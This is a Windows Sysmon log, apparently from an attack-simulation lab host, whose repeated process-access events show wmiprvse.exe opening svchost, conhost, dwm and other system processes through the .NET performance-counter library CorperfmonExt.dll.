13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006284Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-2000-000000009101}2400C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006283Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-2000-000000009101}2400C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006282Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1F00-000000009101}2316C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006281Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1F00-000000009101}2316C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006280Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1E00-000000009101}2308C:\Windows\system32\compattelrunner.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006279Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1E00-000000009101}2308C:\Windows\system32\compattelrunner.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006278Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1700-000000009101}1832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006277Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1700-000000009101}1832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006276Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1600-000000009101}1584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006275Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1600-000000009101}1584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006274Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006273Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006272Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1400-000000009101}1268C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006271Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1400-000000009101}1268C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006270Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1300-000000009101}1232C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006269Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1300-000000009101}1232C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006268Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006267Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006266Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006265Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006264Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006263Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006262Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0F00-000000009101}1144C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006261Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0F00-000000009101}1144C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 